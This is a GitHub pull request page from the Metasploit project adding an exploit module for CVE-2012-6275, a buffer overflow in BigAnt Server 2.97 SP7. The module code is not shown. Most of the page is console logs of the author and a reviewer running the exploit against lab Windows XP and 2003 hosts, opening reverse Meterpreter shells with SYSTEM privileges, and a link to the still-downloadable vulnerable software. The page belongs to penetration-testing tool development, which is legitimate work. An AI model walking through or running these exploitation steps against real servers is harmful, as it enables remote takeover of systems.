Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Added module for CVE-2012-6275 #1499

Merged
merged 1 commit into from Feb 19, 2013
Merged

Added module for CVE-2012-6275 #1499

merged 1 commit into from Feb 19, 2013

Conversation

jvazquez-r7
Copy link
Contributor

Tested successfully with BigAnt Server 2.97 SP7 on Windows XP SP3 and Windows 2003 SP2:

msf  exploit(bigant_server_dupf_bof) > use exploit/windows/misc/bigant_server_sch_dupf_bof 
msf  exploit(bigant_server_sch_dupf_bof) > set rhost 192.168.1.147
rhost => 192.168.1.147
msf  exploit(bigant_server_sch_dupf_bof) > rexploit
[*] Reloading module...

[*] Started reverse handler on 192.168.1.128:4444 
[*] Trying target BigAnt Server 2.97 SP7 / Windows XP SP3...
[*] Sending SCH request...
[*] Sending DUPF request...
[*] Sending stage (752128 bytes) to 192.168.1.147
[*] Meterpreter session 5 opened (192.168.1.128:4444 -> 192.168.1.147:1550) at 2013-02-17 20:19:01 +0100

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : JUAN-C0DE875735
OS              : Windows XP (Build 2600, Service Pack 3).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.1.147 - Meterpreter session 5 closed.  Reason: User exit
msf  exploit(bigant_server_sch_dupf_bof) > set target 1
target => 1
msf  exploit(bigant_server_sch_dupf_bof) > set rhost 192.168.1.155
rhost => 192.168.1.155
msf  exploit(bigant_server_sch_dupf_bof) > rexploit
[*] Reloading module...

[*] Started reverse handler on 192.168.1.128:4444 
[*] Trying target BigAnt Server 2.97 SP7 / Windows 2003 SP2...
[*] Sending SCH request...
[*] Sending DUPF request...
[*] Sending stage (752128 bytes) to 192.168.1.155
[*] Meterpreter session 6 opened (192.168.1.128:4444 -> 192.168.1.155:1034) at 2013-02-17 20:20:11 +0100

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : JUAN-6ED9DB6CA8
OS              : Windows .NET Server (Build 3790, Service Pack 2).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > exit
[*] Shutting down Meterpreter...

@jvazquez-r7
Copy link
Contributor Author

The vulnerable app can be found at the home page still at the time of PR:

http://www.bigantsoft.com/

@wchen-r7
Copy link
Contributor

Tested:

msf  exploit(bigant_server_sch_dupf_bof) > rexploit
[*] Reloading module...

[*] Started reverse handler on 10.0.1.3:4444 
[*] Trying target BigAnt Server 2.97 SP7 / Windows XP SP3...
[*] Sending SCH request...
[*] Sending DUPF request...
[*] Sending stage (752128 bytes) to 10.0.1.17
[*] Meterpreter session 1 opened (10.0.1.3:4444 -> 10.0.1.17:1170) at 2013-02-19 11:34:16 -0600

meterpreter >

@wchen-r7 wchen-r7 merged commit 1a2a0bc into rapid7:master Feb 19, 2013
@jvazquez-r7 jvazquez-r7 deleted the bigant_server_sch_dupf_bof branch November 18, 2014 15:44
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers
No reviews
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.

None yet
2 participants
@jvazquez-r7 @wchen-r7